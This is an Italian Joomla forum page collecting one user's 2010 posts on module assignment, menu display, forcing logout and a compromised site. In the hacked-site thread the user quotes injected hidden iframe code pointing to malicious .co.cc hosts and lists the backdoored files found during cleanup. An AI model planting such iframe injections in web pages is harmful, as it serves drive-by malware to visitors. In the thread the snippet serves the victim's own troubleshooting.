Visualizza post

Questa sezione ti permette di visualizzare tutti i post inviati da questo utente. N.B: puoi vedere solo i post relativi alle aree dove hai l'accesso.


Post - spider80

Pagine: [1] 2
1
Joomla! 1.5 / Assegnazione menu - voci di menu
« il: 05 Ott 2010, 12:58:13 »
Ciao, una domanda semplice.
E' possibile assegnare un modulo a più voci non consecutive?
Oppure è sempre necessario duplicare il modulo?

2
Joomla! 1.5 / Problema visualizzazione menu
« il: 05 Ott 2010, 12:47:35 »
Ciao a tutti,
ho un problema piuttosto insolito.
Sul mio sito sono registrati una decina utenti. Dopo aver fatto login viene visualizzato il classico menu utente, menu cui ho personalizzato lo stile attraverso un suffisso.
Il problema è che 1 (forse 2) di questi utenti non riesce a visualizzarlo.

Perchè?
Errore mio o, per esempio, aggiornamento mancante all'utente?

Nota:
 - l'utente in questione usa explorer + xp, ma non è l'unico ad usare explorer

3
Ma come posso avere un elenco veloce di tutti i componenti, plugin e moduli installati? Per poter controllare ad auno ad uno gli aggiornamenti?

da Estensioni-> Installa/Disinstalla -> Moduli (Componenti, Plugin etc..)

4
spero che non dipenda da problemi di permessi settati con leggerezza.
Io penso sia dovuto a qualche estensione non aggiornata...

Ho anch'io lo stesso problema.
- Poichè uso dei moduli fatti da me, può dipendere da questi moduli?

- come posso controllare che i permessi siano impostati correttamente?

5
Joomla! 1.5 / Re:errore pagina index di joomla
« il: 02 Ott 2010, 14:04:05 »
dopo 12 ore dalla pulizia è ancora tutto ok...
Sembrerebbe risolto.

@joored: tu hai avuto altri problemi?

6
Joomla! 1.5 / Re:errore pagina index di joomla
« il: 02 Ott 2010, 02:00:42 »
posso cancellare tutto il contenuto della cartella tmp (a_manifest.xml)?
non sono un esperto ma credo di si.
Io l'ho già fatto...

7
Joomla! 1.5 / Re:Altro attaco
« il: 02 Ott 2010, 01:46:31 »
Ho subito un altro attacco in questo momento su un sito che avevo appena finito di ripulire!!
Stavolta il codice è:
Codice: [Seleziona]
src='http://12rret.co.cc/B1rnGksrKnZUbbm5aelF6VbjSUM3gtlH' width='2' height='2' frameborder='0'></iframe></body></html>Il sito era aggiornato alla 1520.
Mi arrendo...
Hai letto la modifica che ho fatto? Controlla la cartella tmp e xlmrpc

8
Joomla! 1.5 / Re:errore pagina index di joomla
« il: 02 Ott 2010, 01:10:58 »

Credo di aver cercato in tutto il sito, ho notato che erano hackerati :
- tutti i file index.html di tutte le cartelle (solo il primo livello, non comprese le sottocartelle)
- i file index.php di admin e pubblico e il file index.php della cartella xmlrpc
- infine nella cartella tmp c'è il maledetto file principale, con nome una lunga sequenza di lettere e cifre ed anche altri file sospetti.

 


9
Joomla! 1.5 / Re:errore pagina index di joomla
« il: 02 Ott 2010, 00:26:01 »
ricorda che aggiornando sovrascrivi solo i file corrispondenti a Joomla ... se io ho messo un file motibuco.php li è e li rimane...

M.

Infatti, è andata proprio così. Ho aggiornato alla 20, ho eliminato quel codice dagli index ma hanno bucato ancora dopo poche ore.
Adesso cercherò meglio, secondo voi dove può essere questo file?

10
Joomla! 1.5 / Re:errore pagina index di joomla
« il: 01 Ott 2010, 12:07:18 »
Ok grazie mille.
Si può aggiornare dalla 5.15 alla 20 senza perdere il sito?

11
Joomla! 1.5 / Re:errore pagina index di joomla
« il: 01 Ott 2010, 11:53:54 »
ah... quindi come posso risolvere?

la versione Joomla è 1.5.15

12
Joomla! 1.5 / errore pagina index di joomla
« il: 01 Ott 2010, 11:43:55 »
Ciao a tutti,
in realtà ho già risolto il mio problema, ma vorrei capire a cosa è dovuto.
Dunque:
Ieri mi sono collegato al mio sito Joomla (che normalmente funzionava) e mi visualizzava un sintax error.
Guardando il codice, ho visto che mancava solo il ?> che separa il php dall'html. Ho corretto e funziona.
Com'è possibile che il codice sia modificato?
Non ricordo bene il codice iniziale della pagina index joomla, ma adesso nell'html c'è un iframe con riferimento a http://sytratesthj.co.cc/1/go.php?sid=13. E' normale?

Grazie
 

13
Joomla! 1.5 / Re:Forzare logout
« il: 19 Set 2010, 21:14:51 »
Avrei quasi risolto andando ad eliminare il record di sessione in jos_session.
Il problema è che ignora le query di scrittura su tale tabella, mentre invece esegue correttamente quelle di lettura.
E' un problema di permessi? C'è un modo per risolvere?

Questo il codice:
Codice: [Seleziona]
$thisid = $user->id;
$db =& JFactory::getDBO();
$query = 'SELECT session_id, userid' .
' FROM #__session';

$db->setQuery($query);
$res = $db->loadObjectList();

foreach ($res as $rec) {
if($rec->userid == $thisid) $idses = $rec->userid;
}


$query = "DELETE FROM #__session WHERE userid=$idses";
$db->setQuery($query);

14
Joomla! 1.5 / Forzare logout
« il: 19 Set 2010, 15:45:55 »
Salve . In un mio modulo, vorrei fare un logout dopo qualche secondo di attesa.
Avrei risolto con un semplice redirect, con link quello contenuto nel codice del bottone 'logout'.
Il problema è che in questo modo reindirizza alla pagina per eseguire il logout, ma non lo fa automaticamente.

Come devo modificarlo?

15
Sviluppo / Re:ottenere id utente loggato nel wrapper
« il: 27 Mag 2010, 20:33:43 »
Ho risolto usando un'altra strada. Sicuramente non è la soluzione più corretta, ma funziona. Magari a qualcun'altro principiante come me può interessare...


Ho incluso il mio script in un modulo anzichè in un componente (mi è sembrato più facile implementarlo), pubblicandolo in una nuova posizione che ho chiamato 'centrale'.

Poi ho collegato il modulo ad un articolo, scrivendo nell'articolo :
{loadposition centrale}

In questo modo si può recuperare facilmente l'id con:
$user =& JFactory::getUser();

@mmleoni : Grazie lo stesso per l'aiuto!
 

16
Sviluppo / Re:ottenere id utente loggato nel wrapper
« il: 26 Mag 2010, 00:40:17 »
chi non trova cosa? ma che stai facendo?

ciao
Provo a spiegarmi meglio

Tutti i moduli della pagina (2 menu e un form login) non vengono caricati.

Ho installato il mio componente e l'ho collegato ad una voce di un menu.
Cliccandoci, si apre una pagina che esegue correttamente il mio script , ma che non visualizza i menu laterali ed il form login ,stampando i messaggi di errore

17
Sviluppo / Re:ottenere id utente loggato nel wrapper
« il: 25 Mag 2010, 18:45:17 »
Non riesco proprio a capire quale possa essere il motivo.
La componente che ho creato funziona, ma non riesce a vedere tutti gli altri moduli (in particolare i menu).
Al loro posto stampa il classico messaggio di errore in rosso con il simbolo di divieto d'accesso:



        * Errore nel caricamento dei Moduli:
        * Errore nel caricamento dei Moduli:
        * Errore nel caricamento dei Moduli:
        * Errore nel caricamento dei Moduli:
        * Errore nel caricamento dei Moduli:
        * Errore nel caricamento dei Moduli:
        * Errore nel caricamento dei Moduli:
        * Errore nel caricamento dei Moduli:




A nessuno è mai capitato?


18
Sviluppo / Re:ottenere id utente loggato nel wrapper
« il: 25 Mag 2010, 13:06:03 »
ci sono quasi.
Funziona , ma non riesce a trovare tutti gli altri moduli (menu, etc). Cosa ho sbagliato?

Grazie ancora per la pazienza.....  ::)

19
Sviluppo / Re:ottenere id utente loggato nel wrapper
« il: 25 Mag 2010, 12:23:32 »
Sì hai ragione, pian piano c'ero quasi arrivato.
Mi dà questo errore

Fatal error: Cannot redeclare class jfactory

ho copiato il codice dello script in coda a mycomp.php, utlizzando il codice che ho postato all'inizio per ottenere l'id

20
Sviluppo / Re:ottenere id utente loggato nel wrapper
« il: 25 Mag 2010, 11:57:07 »
@56francesco : No, lo script si trova in un altra directory separata da Joomla

Pagine: [1] 2
Host

Torna su